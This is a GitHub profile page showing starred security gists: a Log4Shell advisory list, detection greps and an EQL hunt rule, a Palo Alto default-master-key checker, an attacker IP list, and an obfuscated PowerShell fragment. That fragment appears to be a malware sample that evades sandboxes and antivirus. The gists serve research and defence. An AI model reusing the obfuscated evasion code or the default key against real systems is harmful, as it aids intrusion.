Skip to content

Instantly share code, notes, and snippets.

Avatar
🎵
Listening to meowzek

Dan danzek

🎵
Listening to meowzek
View GitHub Profile
@LeeHolmes
LeeHolmes / Get-TwitterThread.ps1
Created Nov 15, 2022
Recover your Twitter threads from your Twitter export data
View Get-TwitterThread.ps1
$tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length)
$tweets = $tweetJson | ConvertFrom-Json
$currentThread = ""
foreach($currentTweetJson in $tweets)
{
$currentTweet = $currentTweetJson.tweet
if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes")
{
View gist:352b309a576a1654c6588eb9dcba6d9d
This file has been truncated, but you can view the full file.
$Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"
if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit}
if (${SCR`IP`TP`ATh} -match "avg") {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit}
@rqu1
rqu1 / checkmk.py
Last active Oct 29, 2022
check if a PAN firewall is using the default master key when globalprotect is enabled
View checkmk.py
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'
class PanCrypt():
@theevilbit
theevilbit / get_apple_oss.sh
Last active Apr 25, 2022
Download All Apple OSS Tarballs from Github
View get_apple_oss.sh
#!/bin/zsh
: '
You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs:
https://docs.github.com/en/rest/guides/getting-started-with-the-rest-api
https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token
'
APPLE_OSS_DIR="all_apple_oss_archives"
APPLE_OSS_REPO_FILE="all_apple_oss_repo_names.txt"
@blotus
blotus / log4j_exploitation_attempts_crowdsec.csv
Last active Jan 11, 2023
IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community
View log4j_exploitation_attempts_crowdsec.csv
ip status country as_name
193.46.254.155 validated RO Unmanaged Ltd
59.1.226.211 validated KR Korea Telecom
192.99.62.110 validated CA OVH SAS
209.141.50.153 validated US PONYNET
188.68.61.6 validated DE netcup GmbH
85.51.24.68 validated ES Orange Espagne SA
45.95.55.138 validated DE LUMASERV Systems
148.71.35.230 validated PT Vodafone Portugal - Communicacoes Pessoais S.A.
85.51.217.156 validated ES Orange Espagne SA
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active Feb 2, 2023
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC
View 20211210-TLP-WHITE_LOG4J.md

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active Jan 31, 2023
Log4j RCE CVE-2021-44228 Exploitation Detection
View log4j_rce_detection.md

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@wdormann
wdormann / noappinstaller.reg
Last active Dec 14, 2021
Prevent the ability to click on a ms-appinstaller: URI for the current user
View noappinstaller.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\ms-appinstaller]
"URL Protocol"=-
View EQL hunt for Potential Macro on close
sequence by host.id with maxspan=1s
[process where event.action : "creation_event" and
process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
not (process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\WINDOWS\\splwow64.exe") and
process.args_count >= 2)
] by process.parent.entity_id
[process where event.action : "termination_event" and
process.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe", "explorer.exe", "outlook.exe", "thunderbird.exe")
] by process.entity_id
View main.rs
use std::net::ToSocketAddrs;
use std::sync::mpsc::channel;
fn main() {
std::env::set_var("LOCALDOMAIN", "1");
let mut threads = vec![];
let (tx, rx) = channel();